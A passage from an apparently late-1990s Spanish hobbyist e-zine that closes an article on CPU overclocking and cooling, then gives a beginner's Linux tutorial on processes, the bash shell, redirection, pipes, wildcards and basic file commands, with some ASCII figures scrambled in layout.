--------------------------------@ @ @ @ Para ahorrar el ASCII se podria haber dicho que el flujo de aire entra delante-abajo y sale por atras-arriba, de manera que segun sube va refrigerando las tarjetas instaladas, discos duros ... Unas notas aclaratorias ... donde pone AC/DC se refiere a la fuente, y es que esta tiene su propio ventilador que se ocupa de sacar aire por atras. Desgraciadamente las fuentes que se montan en equipos estandar distan mucho de ser buenas, y sus ventiladores no son muy potentes, por lo que a veces es necesario poner mas ventiladores encima de la fuente, extrayendo aire. Es muy importante que los flujos de entrada y salida de aire sean equivalentes, o sea, si tenemos un ventilador metiendo aire, lo mejor es que tengamos otro sacandolo, y si tenemos dos metiendo, tener otros dos sacando... Estos ventiladores que se montan en las cajas deben ser de 8 cm. y por supuesto, de 12 voltios. Tambien cabria la posibilidad de tener otros ventiladores en otras posiciones mas concretas, como en la tarjeta grafica, en los discos duros, ... Por poner un ejemplo practico, yo tengo una caja con 5 ventiladores, dos en el micro, uno en la tarj. grafica, uno en el frontal introduciendo aire y el de la fuente extrayendolo. .Agua Otro metodo muy conocido entre los overclockers es la refrigeracion por agua. Puede parecer una salvajada pero es algo bastante usado por los que 'ya lo han probado todo'. El truco esta en refrigerar el procesador haciendo pasar por su lado un circuito cerrado de agua. Este circuito debe tener una bomba que mueva el agua, puede ser una bomba de acuario o similar. Tambien debe tener una parte del mismo en el que se enfrie el agua, esta parte puede ser el sistema de aire acondicionado de un coche, suelen ser perfectos para esto. La otra parte importante del sistema de refrigeracion por agua es el intercambiador de calor, que es la parte que esta pegada al micro, esta debe estar formada por una especie de 'caja' metalica perfectamente acoplada al micro, y por donde pase todo el agua fria. El problema de la refrigeracion por agua viene con la condensacion, una sola gota de agua que caiga sobre nuestra placa puede provocar efectos terribles, por lo que se deben mirar con lupa las juntas entre los tubos que transportan el agua y los intercambiadores, bomba ... ya que es en estos puntos donde puede haber escapes de agua o condensacion. Es evidente que este metodo solo es recomendado para los overclockers que ya llevan un tiempo jugando con sus maquinas ... o bah!, si quieres experimentar

con algun equipo viejo, esto es ideal :D .Trucos. Termometro con sonda Un truco muy chulo para conocer la temperatura del interior de la caja consiste en adquirir uno de estos termometros con sonda, se venden como termometros para el coche a una cantidad muy peque~a y son realmente utiles para estas cosas. .Trucos. MBM El MotherBoard Monitor es un programilla muy chulo que usa los sensores de temperatura que suelen tener las placas modernas, para controlar la temperatura de micro, placa ... Tambien nos dice si los ventiladores estan activos, el voltaje de todos los elementos, y muchos otros datos interesantes. Esta es una herramienta indispensable para el overclocker. Puedes bajarla de: http://mbm.livewiredev.com/

5 - Overcloking, si o no? - Cuales son las ventajas de overclockear? Como ya dijimos, overclockear es aumentar la frecuencia de trabajo de un componente electronico, en este caso, el procesador, usar una CPU con una frecuencia de trabajo mas alta significa mejor rendimiento. Si sacas una frecuencia de 450Mhz de un procesador que por defecto es de 300Mhz, el rendimiento de este sera igual al rendimiento de un procesador del mismo tipo que por defecto de fabrica es de 450Mhz. El precio de esta operacion en casi todos los casos esta solamente limitada a la compra de sistemas de enfriamientos de tama~o apropiado, asi que gastas mucho menos plata que si compreras un procesador de la velocidad alcanzada mediante el overclockeo. El overclockear es completamente legal porque al comprar un procesador eres su due~o y puedes hacer con el lo que quieras, pero si le cambias los parametros por defecto, automaticamente pierdes la garantia (si es que la tenias). Antes de overclockear, debes tener en cuenta los pros y los contras. Si, overclockear aumenta el rendimiento de tu sistema, pero, tambien hay riesgos. Si funciona, tu sistema estara trabajando horas extras, se calentara mas, y esto no es bueno para ningun circuito electronico. Si no funciona... Cuelgues, errores, fallos repentinos durante el arranque o programas de intenso consumo de CPU colgaran tu ordenador... En algunos casos habra que trabajarse durante muchas horas el asunto para obtener resultados positivos sin hacer peligrar la estabilidad del sistema... Y tambien podrias freir tu CPU; esto no es algo corriente, y solo ocurrira si eres demasiado ambicioso a la hora de exigir velocidad al overclockear. Otra cosa... la otra vez un amigo me pidio que le overclokeara su amdk6 de 333 Mhz que se compro en el persa. En su caso, se podia cambiar todo desde la BIOS, y pense que unos 400 Mhz no le vendrian mal. Pero... al reiniciarlo, su gindous 98 no cargo, se colgaba y todo eso. Mmm... pense... que onda? Lo puse en 375Mhz... Cargaba gindows, pero al cargar otro programa se colgaba. Ahi recien le pregunte a mi amigo donde se lo compro. Lleno de sospechas abro el computador y saco el ventilador... el procesador era originalmente de 300 Mhz. Los muy canallas del persa lo overclockearon para vender la mula. Es mas, supuestamente era de 32 megas en ram... pero realmente tenia 28MB.

Asi que, como sugerencia, si sus computadores son armados revisenle todo. Otra cosa, a los chatos que venden la mula en el persa les pido que no se vayan en la vola para ganar mas plata. 6 - Recursos Aca te presentamos algunas webs interesantes que puedes visitar si quieres saber mas sobre el overclock, o si te interesa conocer los detalles concretos en el overclock de los micros que comentamos en este articulo. http://www.rittercorp.cl http://www.occomp.cl http://www.overclockeadores.com.ar http://www.overclockers.com/ http://www.arrakis.es/~ubrike/ http://www.ngasis.com/ http://www.combustion.cjb.net/ http://www.overclockers.cjb.net/ http://www.agaweb.com/coolcpu/ http://www.enxebre.es/hardware/ General Failure Mr.Nexus [Nex: Este articulo tuvo historia, ... quiero pedir disculpas publicas a General Failure per tenerlo esperando meses y meses por mi parte del articulo. Es lo que pasa por escribir articulos con irresponsables como yo, :) ] :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 11. Descubriendo Linux Red Hat 5.0 ::--.. by Mr. Nuk3m [Nex: Tercera entrega del que sin duda es el articulo mas enooorme que ha salido publicado en este zine. ] 5. Programas y Procesos 5.1 Ejecucion en primer plano y en "background" 5.2 Demonios 6. La Interaccion Con El Sistema. Shell y Comandos 6.1 La Shell 6.1.1 Funcionamiento de la shell 6.2 Comandos 6.2.1 Comandos simples 6.2.2 Separador de comandos 6.3 La Entrada Estandar y La Salida Estandar 6.3.1 Redireccionando la salida 6.3.2 Redireccionando la conexion de errores estandar 6.3.3 Redireccionando la entrada 6.4 Ca~erias 6.5 Generacion De Nombres De Archivos 7. Comandos Y Utilidades 7.1 Movimiento En El Sistema De Archivos

7.2 Listado De Archivos 7.2.1 Moviendo y copiando archivos 7.3 Manipulando Archivos 7.3.1 Moviendo y copiando archivos 7.3.2 Realizando links 7.3.3 Eliminando archivos 7.4 Manipulando Directorios 7.4.1 Creando directorios 7.4.2 Eliminando directorios 7.5 Busqueda De Archivos 7.5.1 Ejemplos del uso de find 7.6 Cambiando Permisos, Grupos y Due~os 7.6.1 Averiguando los derechos de acceso de un archivo 7.6.2 Cambiando los permisos 7.6.3 Cambiando el due~o y el grupo de los archivos CAPITULO 5 PROGRAMAS Y PROCESOS El concepto central mas importante en cualquier sistema multitarea es el de proceso. Informalmente, un proceso es una abstraccion de un programa en ejecucion. Un programa es una secuencia de instrucciones que la computadora ejecuta con el objetivo de obtener un cierto resultado; es lo que crea el programador. Cuando un programa no esta siendo ejecutado se encuentra en un archivo del disco. Para poder ejecutar el programa, una copia de las instrucciones debe ser cargada en memoria. Cuando un programa se esta ejecutando, se lo llama proceso. Es muy importante conocer las caracteristicas de los procesos para comprender el funcionamiento de Linux y aprovechar la potencia de su modelo multiprogramado. Todas las computadoras modernas pueden hacer varias cosas al mismo tiempo para aprovechar los recursos mas eficientemente. Por ejemplo: se puede estar ejecutando un programa mientras se leen datos de un disco o se imprime un documento. En un sistema multiprogramado, ademas, se pueden estar ejecutando varios procesos al mismo tiempo (posiblemente de distintos usuarios). Esto es posible gracias al concepto de multiprogramacion. En un sistema multiprogramado, cada proceso obtiene una tajada del tiempo del procesador. Estrictamente hablando, en cada instante de tiempo el procesador ejecuta un solo proceso, pero en un periodo determinado, digamos 1 segundo, puede trabajar sobre muchos procesos dando a los usuarios la impresion de la existencia de paralelismo. En realidad, como resultado de lo que realiza internamente obtenemos un "pseudo-paralelismo" que hace que los procesos se puedan ejecutar concurrentemente compartiendo el tiempo del procesador. Asi el S.O. hace que la operacion de la computadora resulte mas productiva. Linux es un sistema multitarea-multiusuario, lo que quiere decir que cada usuario puede estar ejecutando varios procesos al mismo tiempo. El S.O., atendera las necesidades de todos los usuarios de una manera justa, ejecutando concurrentemente todos los procesos. Cada vez que un usuario ejecuta un programa se inicia un proceso en el sistema. Cada proceso tiene un PID (Process ID) unico, que es el numero que sirve para identificarlo. Alguno se preguntara por que no es el nombre del programa el que identifica al proceso ?. Bueno, esto trae muchas desventajas, ya que por ejemplo, pueden haber varios procesos ejecutandose como parte del mismo programa, y seria imposible identificarlos. Sin embargo, cada proceso guarda como atributo el comando que se ingreso para iniciarlo.

5.1 EJECUCION EN PRIMER PLANO Y EN "BACKGROUND" Un proceso puede ejecutarse en primer plano o en "background". Solo puede existir un proceso ejecutandose en primer plano y es el proceso con el cual podemos interactuar. La entrada del proceso se toma del teclado y la salida se muestra por pantalla. Los procesos que se ejecutan en "background" no reciben entradas del teclado ni de ninguna terminal, y en general se ejecutan "silenciosamente" sin necesidad de interaccion. Todos los S.O. proveen algun tipo de mecanismo para ejecutar procesos en primer plano, pero, sin embargo no todos proveen la posibilidad de ejecutar procesos en "background". La importancia de los procesos en "background" se puede analizar considerando sus varias utilidades. Por ejemplo: existen procesos que tardan mucho tiempo para completarse y no requieren la interaccion del usuario. Compilar programas o comprimir un archivo muy grande son ejemplos de este tipo de tareas. Estas conviene realizarlas en "background", ya que mientras varios procesos se estan ejecutando en "background" estamos libres para ejecutar cualquier otro tipo de tarea. Los procesos pueden estar en varios estados, los cuales pueden ser: * Ejecutando: El proceso ejecuta ya sea en primer plano o en "background" * Suspendido: Un proceso suspendido es un proceso que esta temporariamente detenido. Luego de suspender un proceso es posible reanudarlo ya sea en primer plano o en "background". De esta manera el proceso continua en el punto en el cual habia sido suspendido. * Interrumpido: A diferencia de un proceso suspendido, un proceso es interrumpido por algun evento y no puede ser reanudado. Por lo que es inmediatamente terminado. 5.2 DEMONIOS Los demonios son procesos que se ejecutan en "background". Se los puede pensar como procesos que se mantiene "dormidos" a la espera de eventos que los despierten para llevar a cabo una tarea determinada. Cuando un evento despierta un demonio, este se ocupa de ejecutar lo pertinente y cuando completa el tratamiento del evento vuelve a dormirse y asi sucesivamente. Los tipos de eventos que cada demonio espera y las tareas que realiza en respuesta a los mismos dependen de la naturaleza del demonio en cuestion. Las tareas mas comunes para las que se utilizan demonios son: demonios que controlan dispositivos (impresoras(lpd), adaptadores de red (pppd), etc.), control de los protocolos de red (tcp/ip (tcpd), etc.), agentes de transferencia de correo electronico (sendmail), etc.

CAPITULO 6 LA INTERACCION CON EL SISTEMA. SHELL Y COMANDOS 6.1 LA SHELL Todo S.O. debe proveer un mecanismo para que el/los usuarios puedan comunicarle lo que quieren realizar y para poder interactuar con el. Linux posee una interfase de comunicacion llamada "shell" y es el medio mediante el cual el usuario puede comunicarle comandos al sistema y recibir la salida de los procesos con los que interactua.

Basicamente, la shell es un proceso mas que obviamente se ejecuta en primer plano, ya que sino seria imposible interactuar con el mismo. Su funcionamiento se limita a recibir comandos del usuario, interpretarlos y ejecutar las tareas necesarias en respuesta a los mismos. El nombre tecnico de la shell puede ser "interprete de comandos". Su funcion se puede comparar a la del programa "comand.com" en MS-DOS que esencialmente realiza las mismas tareas. En los sistemas UNIX cada usuario puede elegir que shell quiere utilizar para comunicarse con el sistema. Linux tiene varias shells las cuales pueden ser elegidas por el usuario. Inclusive es posible que el usuario programe y utilice su propia shell si asi lo desea. Las shells que Linux provee son: * sh: Shell de Bourne. Es la shell mas utilizada en los sistemas UNIX. * csh: Shell de C. Es la shell preferida por los programadores. Es compatible con la shell de Bourne. * ash: Shell de Ash. Es una version especial reducida. Se utiliza cuando existe muy poca memoria disponible. * ksh - pdksh: Shell de Korn. Extension de la shell de Bourne. * bash: Bourne Again Shell. Es la shell de la FSF (Free Software Fundation). Amplia las capacidades de la shell de Bourne y es utilizada por Linux como shell predeterminada. * zsh: Z Shell. Compatible con la shell de Bourne. 6.1.1 FUNCIONAMIENTO DE LA SHELL La shell es iniciada inmediatamente cuando un periodo de inicio de sesion es autenticado exitosamente. El sistema recuerda cual es la shell que utiliza cada usuario y carga la correspondiente al usuario que inicio la sesion. Desde este momento, la shell muestra un identificador llamado "prompt" que significa que esta esperando que el usuario ingrese una orden. Una vez que se visualiza el prompt, el usuario puede ingresar cualquier orden, ya sea para que se ejecute en primer plano o en "background". Si el pedido de ejecucion dado por el comando ingresado especifica que el proceso se debe ejecutar en "background", el proceso se inicia y se comienza a ejecutar en "background", por lo que el shell inmediatamente vuelve a mostrar el prompt y al estado de espera de mas ordenes. Asi es posible seguir ejecutando ordenes. Si el proceso se debia ejecutar en primer plano, la shell no retorna el prompt hasta que el proceso ejecutado se termine. Por lo tanto debemos esperar a que termine el proceso para poder iniciar otro. 6.2 COMANDOS NOTA: Desde esta seccion en adelante todo lo referente a la shell y sus comandos estara basado en la shell bash (Bourne Again Shell) que es la shell predefinida en Linux :) El uso interactivo tipico de la shell se basa en ingresar comandos simples, comandos con calificadores, comandos con facilidades de generacion de nombres de archivos, redireccion de entrada-salida, y comandos combinados mediante el uso de "ca~erias". Estas tecnicas son poderosas y extremadamente utiles, pero son solo una parte de las capacidades de la shell.

La shell es, ademas de interprete interactivo de comandos, un interprete de un lenguaje de programacion de comandos llamado "El lenguaje de programacion de la shell". Este lenguaje nos permite realizar nos permite realizar "scripts" que sera posible ejecutar como un programa binario mas, con la diferencia que lo interpreta la shell linea por linea y ejecuta los comandos correspondientes. Mas adelante nos ocuparemos de analizar este lenguaje de programacion en profundidad, ya que es una de las caracteristicas mas poderosas de la shell y nos sirve para automatizar muchas de las tareas que tenemos que realizar en el sistema y nos ayuda a ahorrar la cantidad de comandos que tenemos que tipear. 6.2.1 COMANDOS SIMPLES Un comando simple es una secuencia de (una o mas) palabras separadas por espacios o tabuladores. La primer palabra de la secuencia es el nombre del comando. Las palabras subsiguientes son los argumentos del comando. Los comandos mas simples son de una sola palabra. Los comandos mas comunes pueden ser: ls para listar el contenido de un directorio, ps para ver los procesos que se encuentran creados en el sistema, reboot para reiniciar el sistema, etc. ARGUMENTOS Los comandos, en su forma mas simple, se ejecutan simplemente poniendo el nombre del archivo correspondiente. Sin embrago, existen comandos que necesitan argumentos para trabajar. Un ejemplo de esto puede ser el comando cp que sirve para copiar archivos. Este comando necesita dos argumentos obligatorios, el/los archivo fuente y el detino de la copia. Por ejemplo: ==> cp /home/juan/cuotas.tex /home/tony/ Los argumentos se utilizan para pasar informacion adicional a los programas que ejecutamos. En algunos casos son opcionales, en otros obligatorios y puede ser que la cantidad de argumentos de algunos comandos pueda ser variable. La gran mayoria de las veces los argumentos seran nombres de archivos o de directorios, pero esto es dependiente de cada programa. El nombre del comando y sus argumentos deben ser separados por uno o mas espacios, sino la shell nos informara del error con un mensaje. Ejemplo: ==> ls/bin bash: ls/bin: No such file or directory Otros argumentos son los "modificadores" que son formas de pasar opciones a los programas y seran tratados a continuacion. MODIFICADORES Los comandos, usualmente, sirven para realizar una funcion pero pueden aceptar varias opciones que especifiquen como se debe realizar esta tarea. Las opciones que cada comando acepta y la sintaxis con la que se especifica la opcion dependen exclusivamente del comando en cuestion. Aunque en general se puede hablar de "modificadores" que son la forma general de ingresar las opciones a los comandos. Consideremos el siguiente comando: ==> ls -a Este comando listara el contenido del directorio actual, pero mostrara

ademas los que comienzan con ".", ya que estos son ocultos y al ejecutar ls no son mostrados. Este comportamiento es especificado por la opcion de mostrar los archivos ocultos que es seleccionada con el modificador -a (all). NOTA: Un modificador muy util es -h que sirve para especificarle a un comando que nos muestre su sintaxis y las opciones que soporta. Esto sirve como referencia del funcionamiento del comando. Este modificador se puede usar con la mayoria de los comandos de Linux. Algunos comandos soportan --help o -help para la misma funcion. 6.2.2 SEPARADOR DE COMANDOS Para ingresar varios comandos en una sola linea es necesario separarlos por ";". Por ejemplo: ==> date;df -h La salida de este comando sera la siguiente: Thu Apr 15 17:29:15 ART 1999 Filesystem Size Used Avail Capacity Mounted on /dev/hda3 1.6G 613M 963M 39% / /dev/hdc1 2.0G 1.9G 138M 93% /akenaton /dev/hda2 298M 238M 60M 80% /games /dev/hda1 2.0G 1.5G 546M 73% /nt La primera linea de la salida es generada por el comando date y muestra la hora y el dia actual en el sistema. La tabla que es mostrada a continuacion es generada por el comando df y muestra las capacidades, tama~os utilizados y disponibles, y puntos de montaje de los distintos sistemas de arhcivos que se encuentran montados. Notemos que las unidades se muestran en distintos formatos de acuerdo al valor que tenga cada campo. Esto es causado por la opcion -h que indica al comando que muestre los valores con unidades significativas y no en numero de bloques. 6.3 LA ENTRADA ESTANDAR Y LA SALIDA ESTANDAR Los programas basados en el modelo de entrada/salida por teletipo son aquellos en los que su salida consiste en lineas de texto ASCII. Estos programas ofrecen solo una primitiva interfase con el usuario basada en linea de comandos. Pero justamente por esto, y por la funcionalidad que provee la shell, es posible interconectar varios programas que realizan tareas simples para realizar tareas mas complejas. Todos los comandos de Linux y la mayoria de sus utilidades se encuentran basados en este modelo. Por esto es importante entender el funcionamiento e interaccion de los programas, la shell y la entrada/salida para sacar provecho a estas facilidades. Cuando un programa, del modelo de teletipo, produce una salida sobre una terminal el programa, en general, esta realizando operaciones de salida a lo que se denomina salida estandar (stdout). Asimismo, cuando tipeamos algo en el teclado de la terminal, un programa lee los caracteres de lo que se llama entrada estandar (stdin). Para comunicar errores y mensajes de diagnostico, existe una conexion de salida separada llamada stderr. La shell, por ejemplo, es un programa que lee caracteres de stdin e interpreta los mismos como comandos, argumentos, etc. El comando ls envia su salida (el contenido del directorio de trabajo) a stdout y luego se visualiza en nuestra pantalla. Este funcionamiento es el predefinido, ya que

la entrada estandar y la salida estandar se encuentran, normalmente, asociadas a la terminal de la computadora, stdin el teclado y stdout a la pantalla. La shell, sin embargo, nos permite reasignar o redireccionar las conexiones de entrada, salida o la de diagnostico de errores. Esta es una de las caracteristicas mas poderosas de Linux :) 6.3.1 REDIRECCIONANDO LA SALIDA Supongamos que ejecutamos el comando ps (process reporta del estado de los procesos, que nosotros ejecutando en el sistema. La figura 6.1a nos muestra una ejecucion del comando ps. Asi visualizamos pantalla. status), el cual nos iniciamos, que se estan la salida generada por la salida en nuestra

Si nos interesa guardar la salida del comando ps, por ejemplo para analizarla posteriormente, podemos hacer uso de la redireccion de la salida que nos brinda la shell. Le indicamos a la shell que queremos redireccionar la salida con el simbolo ">". Entonces, en nuestro ejemplo, debermos ejecutar el comando como indica la figura 6.1b. En la misma, observamos que el comando termina de ejecutarse sin realizar ninguna salida en la pantalla, pues la salida del comando se envio al archivo "procesos" y fue guardada en el mismo. Luego mostramos el contenido del archivo procesos, con el comando cat, y visualizamos la salida que el comando ps realizo al ejecutarse. NOTA: No es necesario que el archivo sobre el cual escribimos al redireccionar la salida exista antes de ejecutar el comando ya que la shell crea el archivo, si es necesario. REDIRECCION NO-DESTRUCTIVA DE LA SALIDA Al redireccionar la salida de un comando a un archivo se sobreescriben completamente los contenidos del mismo. Hay ocasiones en las que no queremos perder la informacion almacenada en un archivo, sino agregarle datos al final del mismo. En el ejemplo de la figura 6.1b, los contenidos del archivo procesos, si existia antes de ejecutarse el comando, son sobreescritos. Para poder concatenar informacion en un archivo usamos ">>" en vez de ">". 6.3.2 REDIRECCIONANDO LA CONEXION DE ERRORES ESTANDAR La conexion de errores estandar es la segunda conexion de salida que el S.O. Linux abre para cada programa. Normalmente es conectada a la terminal, o sea a nuestra pantalla, y es por eso que cada vez que un programa muestra un mensaje de error, este es visualizado en ella. Si ejecutamos un comando y redireccionamos la salida del mismo a un archivo, no estamos cambiando para nada la conexion de errores estandar de ese comando, por lo que cualquier mensaje de error que el comando reporte sera visualizado en pantalla. Esto ocurre porque la conexion de errores estandar no se encuentra redireccionada. Hay programas que producen una cantidad voluminosa de salida. En estos casos uno puede querer redireccionar la conexion de errores estandar a un archivo, para luego examinar los mensajes que el programa genero. Para redireccionar la conexion de errores estandar se utiliza "2>". El numero 2 indica el numero de conexion de salida que es justamente la conexion de errores estandar. 6.3.3 REDIRECCIONANDO LA ENTRADA Tambien es posible redireccionar la entrada. Ya vimos que uno de los programas que lee la informacion de la entrada es la shell, los demas

programas que vimos (ls, ps, cat, etc.) producen su salida sin leer de la entrada estandar. La shell lee los comandos a ejecutar de la entrada estandar. Como la entrada estandar puede ser redireccionada a un archivo, es posible que la shell obtenga los comandos a ejecutar desde un archivo. Un ejemplo de esta situacion se muestra en la figura 6.2. En la misma vemos que los contenidos del archivo "comandos" son los nombres de dos comandos de Linux: date y ps. Luego utilizando el simbolo "<" redireccionamos la entrada del programa bash (Bourne Again Shell) al archivo comandos y los resultados se muestran en pantalla. REDIRECCIONANDO LA SALIDA Y LA ENTRADA SIMULTANEAMENTE Es posible redireccionar, simultaneamente, la entrada estandar y la salida estandar. Cuando esto sucede, el unico rol que cumple la terminal es ingresar el comando que vamos a ejecutar, pero luego el programa trabaja sin tener asociada la entrada ni la salida a la terminal. Salvo que no se redireccione la conexion de errores estandar porque los mensajes de error serian visualizados en pantalla. La forma de redireccionar la salida y la entrada simultaneamente se muestra con un ejemplo en la figura 6.3. 6.4 CA~ERIAS: LA INTERCONEXION ENTRE PROGRAMAS Las ca~erias (pipes) conectan la salida estandar de un programa con la entrada estandar de otro programa. Una ca~eria es diferente a la redireccion de la entrada/salida. Al redireccionar la entrada conectamos la entrada de un programa a un archivo y al redireccionar la salida conectamos la salida del programa a un archivo. Una ca~eria coencta la salida de un programa directamente con la entrada de otro programa. Ver figura 6.4. Para construir una ca~eria debemos separar los comandos que queremos conectar con el simbolo "|". En el ejemplo de la figura 6.5, conectamos dos comandos: ls y wc. El primero nos lista el contenido de un directorio, en este caso del directorio /bin. El segundo comando, wc (word count) sirve para contar palabras, lineas y caracteres, pero al pasarle la opcion -w le estamos diciendo que solo cuente palabras. El funcionamiento de este pipe es muy simple: El comando ls lee el contenido del directorio /bin y genera una lista de palabras con los nombres de los archivos y directorios encontrados. Esta lista, en vez de ser enviada a la terminal, es redireccionada a la entrada estandar del comando wc que comienza a contar las palabras y muestra el resultado en la salida estandar del mismo que es la terminal. 6.5 GENERACION DE NOMBRES DE ARCHIVOS El S.O. Linux nos permite especificar conjuntos de nombres de archivos automaticamente utilizando "generacion de nombres de archivos y caracteres comodines". Cuando ingresamos argumentos a un comando, la shell examina los mismos con el objeto de detectar el uso de la generacion de nombres de archivos. El usuario controla la generacion de nombres de archivos especificando un modelo para los nombres de archivo. La shell compara el modelo provisto con todos los archivos del directorio de trabajo. Si alguno de los nombres de archivo responde al modelo, entonces una lista ordenada alfabeticamente con todos los nombres de archivos que responden al modelo es enviada al programa. Si ninguno de los nombres de archivo del directorio actual cumple con el modelo, entonces el modelo (en forma textual) es enviado al programa como argumento. Un modelo consiste de caracteres ordinarios y de "metacaracteres" llamados caracteres comodines. Los caracteres ordinarios son interpretados textualmente; los metacaracteres tiene un significado propio. Los metacaracteres utilizados para la

generacion de nombres de archivo y sus significados se muestran en la tabla 6.1. ||| | Metacaracter | Significado | |--------------|----------------------------------------------------------| | * | Equivale a cualquier cadena de caracteres | | ? | Equivale a cualquier caracter | | [ | Comienza una clase de caracteres | | ] | Termina una clase de caracteres | | | Indica un rango de caracteres en una clase de caracteres | |______________|__________________________________________________________| Tabla 6.1: Metacaracteres utilizados para generacion de nombres de archivo. El asterisco y el signo de pregunta son muy faciles de usar. Por ejemplo *.c equivale a todos los archivos que tienen como sufijo .c como pueden ser: prog.c, ab.c, Main.c; los siguientes nombres no satisfacen el modelo unit2.cc, main.c.cc; el modelo ???.tex equivale a todos los nombres de archivo que tengan tres caracteres cualesquiera y luego el sufijo .tex, por ejemplo: ref.tex, cp1.tex, bea.tex, c++.tex, cumplen con el modelo pero ab.tex, tony.tex, intro.tex chapter1.tex.z no lo satisfacen. Los corchetes y el signo menos se utilizan para formar modelos para grupos de caracteres. Los caracteres en el grupo (o clase) son especificados dentro de los corchetes. El modelo abc[aeiou] representa todo nombre de archivo que comienze con abc y culmine con una unica vocal. El signo menos se utiliza para especificar rangos de caracteres. El modelo chapter[0-9] representa a todos los nombres de archivo que comienzan con chapter y finalizan con un digito. Notemos que el rango incluye a sus limites. Es necesario realizar una aclaracion con respecto a los archivos ocultos. Recordemos que todo archivo tal que su nombre comience con un punto es considerado un archivo oculto. La generacion de nombres de archivos no considerara que un modelo representa a un archivo oculto si no se especifica explicitamente el punto al comienzo del modelo. Por ejemplo: El modelo xinit* no representara al archivo cuyo nombre es .xinitrc. Para solucionar esto es necesario especificar el modelo de la siguiente forma .xinit*. # ps PID TTY STAT 338 1 S 356 1 S 368 1 S 372 1 S 373 1 S 377 1 S 381 1 S 394 1 S 412 p0 S 415 1 S 479 1 S 515 p0 R TIME COMMAND 0:00 /bin/login -- root 0:00 -bash 0:00 sh /usr/X11R6/bin/startx 0:01 wmaker 0:06 kfm 0:00 wmmon 0:00 mount.app 0:37 emacs 0:01 kdvi apunte.dvi 0:01 /usr/local/bin/x11amp 0:00 kvt 0:00 ps

a. Ejecucion del comando ps # ps > procesos # cat procesos PID TTY STAT TIME COMMAND

338 1 S 356 1 S 368 1 S 372 1 S 373 1 S 377 1 S 381 1 S 394 1 S 412 p0 S 415 1 S 479 1 S 515 p0 R

0:00 0:00 0:00 0:01 0:06 0:00 0:00 0:37 0:01 0:01 0:00 0:00

/bin/login -- root -bash sh /usr/X11R6/bin/startx wmaker kfm wmmon mount.app emacs kdvi apunte.dvi /usr/local/bin/x11amp kvt ps

b. Ejecucion del comando ps redireccionando la salida al archivo "procesos" Figura 6.1: Redireccionando la salida del comando ps. # cat comandos date ps # bash < comandos Thu Apr 15 19:47:03 ART 1999 PID TTY STAT TIME COMMAND 338 1 S 0:00 /bin/login -- root 356 1 S 0:00 -bash 368 1 S 0:00 sh /usr/X11R6/bin/startx 372 1 S 0:01 wmaker 373 1 S 0:06 kfm 377 1 S 0:00 wmmon 381 1 S 0:00 mount.app 394 1 S 0:37 emacs 412 p0 S 0:01 kdvi apunte.dvi 415 1 S 0:01 /usr/local/bin/x11amp 479 1 S 0:00 kvt 515 p0 R 0:00 ps Figura 6.2: Redireccionando la entrada para que la shell ejecute comandos desde un archivo. # cat comandos date pwd # bash < comandos > salida # cat salida Thu Apr 15 20:06:30 ART 1999 /home/tony/docs/linux Figura 6.3: Redireccionando la entrada y la salida.

||__ <------------------------------------------------------\ |---|____| |_____ | | | | | stderr | | |______| | -----------------------------------> || | | | | | | | |---------| | _--> |________| | | PROG1 | | | | | |______________| --\ | /\ --/

| stdout | | | | | | | \ | | | ||__ | | |---|____| |_____ | | | | | | <--/ stdin | | |______| | | | | | | |---------| | stdout & stderr | | PROG2 | | |______________| -----------------------------/ Figura 6.4: Ca~eria de dos programas. # ls /bin | wc -w 75

Figura 6.5: Ejemplo de una ca~eria. Contar la acntidad de archivos en un directorio.

CAPITULO 7 COMANDOS Y UTILIDADES 7.1 MOVIMIENTO EN EL SISTEMA DE ARCHIVOS EL directorio actual, o el direcorio de trabajo, es probablemente la pieza de informacion mas importante del entorno de trabajo. En cualquier momento, podemos saber cual es el directorio actual ejecurando el comando pwd (print working directory). La utilizacion de este comando se muestra en la figura 7.1. # pwd /home/tony/txts/manual-linux Figura 7.1: Averiguando el directorio de trabajo. Una vez que completamos el proceso de inicio de sesion (log in), nos encontramos en el directorio home que el administrador del sistema nos ha designado. Con el comando cd (change directory) podemos cambiar el directorio de trabajo. Para ello tenemos que invocarlo con un argumento: el directorio que queremos que sea el directorio de trabajo. Se muestran ejemplos de este comando en la figura 7.2. El argumento con el que proveemos al comando cd puede ser tanto una ruta absoluta como una ruta relativa. En la figura 7.2a vemos un ejemplo de una ruta relativa y en las figuras 7.2b y c vemos ejemplos de argumentos de rutas relativas. Como caso especial, si ejecutamos el comando cd sin parametros, el nuevo directorio de trabajo sera nuestro direcotrio home. 7.2 LISTADO DE ARCHIVOS 7.2.1 LISTANDO ARCHIVOS

Como fue comentado anteriormente, el comado ls (list) se utiliza para listar el contenido de los directorios. Este comando utiliza muchas opciones, muchas de las cuales no vamos a tratar aqui. Nos vamos a ocupar de su uso mas comun y de sus opciones mas utiles. El comando ls acepta multiples argumentos. Cada argumento que le pasamos puede ser el nombre de un archivo, de un directorio o una opcion (modificador). Si no le pasamos ningun argumento, entonces nos mostrara el contenido del directorio de trabajo. Por defecto, este comando nos muestra el contenido de los directorios en forma de columnas con los nombres de archivos encontrados como se muestra en la figura 7.3. # pwd /home/tony # cd / # pwd / a. Cambiando de directorio de trabajo de nuestro directorio home al directorio raiz. # pwd / # cd bin # pwd /bin b. Cambiando el directorio de trabajo a un subdirectorio. # pwd /home/tony/txts # cd .. # pwd /home/tony c. Cambiando el directorio de trabajo al directorio padre. Figura 7.2: Cambiando el directorio de trabajo. # ls init.d rc rc.local rc.sysinfo rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d

Figura 7.3: Listado del contenido de un directorio. Como vemos, el listado se presenta en orden alfabetico. De esta forma, la unica informacion que tenemos de cada archivo o directorio listado es su nombre. Cuando queremos conocer informacion adicional de cada archivo debemos usar los modificadores adecuados. LISTADO EN FORMATO LARGO El modificador -l indica al comando ls que visualize los nombres de archivos y directorios junto con otros atributos, mas especificamente permisos, su due~o, el grupo al que pertenece, la cantidad de links posee, su tama~o (en bloques), y su fecha de modificacion. Un ejemplo de listado largo de archivos se muestra en la figura 7.4. # ls -l drwx------rw-r--r-2 root 1 root root root los sus que un

1024 Mar 22 20:55 Xfree86/ 25787 Apr 9 04:48 djetool-0.1.6.tar.gz

